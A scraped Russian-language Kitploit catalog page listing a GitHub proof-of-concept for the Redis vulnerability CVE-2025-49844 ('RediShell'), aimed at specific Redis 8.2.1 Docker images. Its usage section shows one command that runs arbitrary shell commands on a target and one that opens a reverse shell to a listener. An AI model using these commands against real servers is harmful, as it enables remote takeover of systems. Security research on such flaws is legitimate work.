Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-49844 — Proof-of-concept for CVE-2025-49844 | Kitploit
Инструменты/GitHubGitHub/saneki/cve-2025-49844
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubsaneki/cve-2025-49844

cve-2025-49844

Proof-of-concept for CVE-2025-49844

Репозиторий
2569 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49844

Мое личное доказательство концепции для CVE-2025-49844, также известного как RediShell.

Поддерживаемые целевые сборки:

  • x86-64 Linux redis:8.2.1-alpine Docker image
  • x86-64 Linux redis:8.2.1-bookworm Docker image

Это немного коряво, вероятно, не так хорошо, как у Wiz Research. Тем не менее, я рад, что мне удалось заставить его работать до того, как выложат доклады с Hexacon 2025, и я отлично провел время, исследуя его.

Использование

Выполнение односторонних команд оболочки:

root@kitploit:~
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"

Подключение к обратной оболочке:

root@kitploit:~
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444
Скачать инструмент